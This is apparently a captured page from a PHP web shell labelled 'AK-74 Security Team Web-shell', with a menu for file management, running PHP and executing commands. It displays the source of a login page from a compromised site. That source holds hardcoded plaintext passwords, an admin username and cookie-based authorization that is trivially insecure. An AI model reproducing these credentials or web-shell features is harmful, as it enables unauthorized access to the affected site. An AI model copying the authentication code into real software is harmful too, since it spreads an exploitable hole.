.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Digitalmap</title> </head> <body> <div style="width: 400px; padding-left: 500px; padding-top: 59px;"> <FORM METHOD="POST" action=""> <H2 style="color:#09F">henditech</H2> <BR> User Name: <BR><INPUT TYPE="TEXT" NAME="username" SIZE="30"> <BR> Password: <BR><INPUT TYPE="PASSWORD" NAME="password" SIZE="30"> <BR><BR> <INPUT TYPE="SUBMIT" VALUE="login"> </FORM> </div> <?php if(!empty($_POST['username'])&&!empty($_POST['password'])){ $passwords = array("name1" =>"saultan@#$", "name2" =>"salahibrahimyousef"); if ($_POST['password']== $passwords['name1']&&$_POST['username']=='admin'){ setcookie("username", $_POST['username'], time()+1200); $authorized = true; header('Location: navgiator.php'); //echo "<H2>Access granted.</H2>"; //die; }else{ setcookie("username", "", time()-3600); echo "<H2>Invalid user name or password: access denied.</H2>"; } } ?> </body> </html>
Rename:
-